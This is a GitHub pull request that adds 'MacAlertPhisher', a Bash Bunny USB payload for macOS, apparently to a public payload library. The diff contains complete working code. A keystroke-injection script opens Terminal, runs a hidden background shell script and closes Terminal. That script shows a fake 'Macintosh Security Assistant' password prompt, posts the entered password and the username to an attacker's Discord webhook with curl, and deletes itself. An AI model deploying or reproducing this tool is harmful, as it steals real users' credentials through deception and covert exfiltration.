### PR TITLE
Add MacAlertPhisher

### DIFF
--- a/payloads/library/phishing/MacAlertPhisher/README.md
+++ b/payloads/library/phishing/MacAlertPhisher/README.md
@@ -1,0 +1,20 @@
+# MacAlertPhisher
+* Author: 90N45
+* Version: 1.0
+* Target: Mac
+* Attackmodes: HID, STORAGE
+
+### Description
+Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
+
+### Setup
+Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file.
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Set ATTACKMODE |
+| Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
+
+*Average runtime: 26 seconds*

--- a/payloads/library/phishing/MacAlertPhisher/README.md
+++ b/payloads/library/phishing/MacAlertPhisher/README.md
@@ -7,6 +7,10 @@
 ### Description
 Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
 
+<img width="532" alt="MAcAlertPhisher_alert_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/d52f4924-c51a-46fd-b2c3-2a8cce45e2cc">
+<br>
+<img width="412" alt="MacAlertPhisher_message_preview" src="https://github.com/90N45-d3v/bashbunny-payloads/assets/79598596/8d4e804c-0630-4853-b4ed-7d0904408a50">
+
 ### Setup
 Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
 

--- a/payloads/library/phishing/MacAlertPhisher/README.md
+++ b/payloads/library/phishing/MacAlertPhisher/README.md
@@ -8,7 +8,7 @@
 Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
 
 ### Setup
-Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file.
+Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) link into the `discord` variable in the `script.sh` file. Optional, you can change the other variables at the top of the `script.sh` file to your needs.
 
 ### Status
 | LED | State |
@@ -17,4 +17,4 @@ Please insert your [Discord’s Webhook](https://support.discord.com/hc/en-us/ar
 | Yellow single blink (ATTACK) | Prepaires and executes phishing-script on the victims machine |
 | Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Attack finished (Ready to unplug) |
 
-*Average runtime: 26 seconds*
+*Average runtime: 27 seconds*

--- a/payloads/library/phishing/MacAlertPhisher/payload.txt
+++ b/payloads/library/phishing/MacAlertPhisher/payload.txt
@@ -1,0 +1,36 @@
+#!/bin/bash
+#
+# Title:         MacAlertPhisher
+# Description:   Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.
+# Author:        90N45
+# Version:       1.0
+# Category:      Phishing
+# Attackmodes:   HID, STORAGE
+
+LED SETUP
+ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
+
+LED ATTACK
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2500
+
+QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/script.sh /tmp/script.sh"
+QUACK ENTER
+QUACK DELAY 1000
+
+QUACK STRING "diskutil eject /Volumes/BashBunny/"
+QUACK ENTER
+QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
+QUACK ENTER
+QUACK GUI SPACE
+QUACK DELAY 1500
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "killall Terminal"
+QUACK ENTER
+
+LED FINISH

--- a/payloads/library/phishing/MacAlertPhisher/payload.txt
+++ b/payloads/library/phishing/MacAlertPhisher/payload.txt
@@ -25,11 +25,12 @@ QUACK STRING "diskutil eject /Volumes/BashBunny/"
 QUACK ENTER
 QUACK STRING "chmod +x /tmp/script.sh && nohup bash /tmp/script.sh &> /dev/null &"
 QUACK ENTER
+QUACK DELAY 2000
 QUACK GUI SPACE
-QUACK DELAY 1500
+QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
-QUACK DELAY 500
+QUACK DELAY 1000
 QUACK STRING "killall Terminal"
 QUACK ENTER
 

--- a/payloads/library/phishing/MacAlertPhisher/script.sh
+++ b/payloads/library/phishing/MacAlertPhisher/script.sh
@@ -2,32 +2,75 @@
 
 # Discord Webhook Link (NEEDED)
 discord=""
+# The alert's title
+title="Macintosh Security Assistant"
 # The alert's text
-dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human."
-# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon)
+dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are the owner."
+# The alert's icon (for ex. "stop", "caution", "note")
 icon="stop"
 # A custom application, that should open the alert (for ex. "Finder")
 app=""
-# Base64 encode the entered string to prevent an injection/syntax error
+# Base64 encode the entered string to prevent an injection/error
 base64=false
+# Check if an internet connection is available and wait until it is before trying to send the Discord message
+internet_check=false
 
 #### The main script
 
-if [[ ${app} != "" ]]; then
-	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
-elif [[ ${app} == "" ]]; then
-	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
-fi
+date=$(date)
+user=$(whoami)
 
+if [[ ${app} != "" ]]; then
+	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
+elif [[ ${app} == "" ]]; then
+	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' with title "'"${title}"'" buttons {"Continue"} default button "Continue" with hidden answer')
+fi
 
 pwd=${pwd#*"button returned:Continue, text returned:"}
 
 if [[ ${base64} == true ]]; then
 	pwd=$(echo $pwd | base64)
-	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord}
+	enc_txt="(Base64)"
 else
-	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord}
+	enc_txt=""
 fi
+
+# Discord Embed Message
+embed="{
+  \"embeds\": [
+    {
+      \"color\": 14427938,
+      \"footer\": {
+        \"text\": \"Captured: ${date}\"
+      },
+      \"author\": {
+        \"name\": \"Bash Bunny • MacAlertPhisher\",
+        \"url\": \"https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/phishing/MacAlertPhisher\",
+        \"icon_url\": \"https://www.gitbook.com/cdn-cgi/image/width=40,dpr=2,height=40,fit=contain,format=auto/https%3A%2F%2F3076592524-files.gitbook.io%2F~%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252FnxJgJ9UdPfrcuL1U8DpL%252Ficon%252F1UaEKnAJMPWZDBVtU8Il%252Fbb.png%3Falt%3Dmedia%26token%3D43bf1669-462c-4295-b30b-94c295470371\"
+      },
+      \"fields\": [
+        {
+          \"name\": \"Current User\",
+          \"value\": \"${user}\",
+          \"inline\": true
+        },
+        {
+          \"name\": \"Entered Credentials ${enc_txt}\",
+          \"value\": \"${pwd}\",
+          \"inline\": true
+        }
+      ]
+    }
+  ]
+}"
+
+if [[ ${internet_check} == true ]]; then
+	while [[ $(ping -c1 google.com | grep -c "1 packets received") != "1" ]]; do
+		sleep 5
+	done
+fi
+
+curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "${embed}" ${discord}
 
 # Self destruct
 rm /tmp/script.sh

--- a/payloads/library/phishing/MacAlertPhisher/script.sh
+++ b/payloads/library/phishing/MacAlertPhisher/script.sh
@@ -1,0 +1,33 @@
+#!/bin/bash
+
+# Discord Webhook Link (NEEDED)
+discord=""
+# The alert's text
+dialog="Your Mac has detected unusual activity. Enter your password to confirm that you are a human."
+# The alert's icon (for ex. "stop", "caution", "note" or a custom path to an icon)
+icon="stop"
+# A custom application, that should open the alert (for ex. "Finder")
+app=""
+# Base64 encode the entered string to prevent an injection/syntax error
+base64=false
+
+#### The main script
+
+if [[ ${app} != "" ]]; then
+	pwd=$(osascript -e 'tell app "'"${app}"'" to display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
+elif [[ ${app} == "" ]]; then
+	pwd=$(osascript -e 'display dialog "'"${dialog}"'" default answer "" with icon '"${icon}"' buttons {"Continue"} default button "Continue" with hidden answer')
+fi
+
+
+pwd=${pwd#*"button returned:Continue, text returned:"}
+
+if [[ ${base64} == true ]]; then
+	pwd=$(echo $pwd | base64)
+	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something (Base64 encoded): ${pwd}\"}" ${discord}
+else
+	curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"The Bash Bunny phished something: ${pwd}\"}" ${discord}
+fi
+
+# Self destruct
+rm /tmp/script.sh


### PR DESCRIPTION
Creates a customizable alert that prompts for the victim's credentials and shares them with you via Discord. Even after unplugging the Bash Bunny.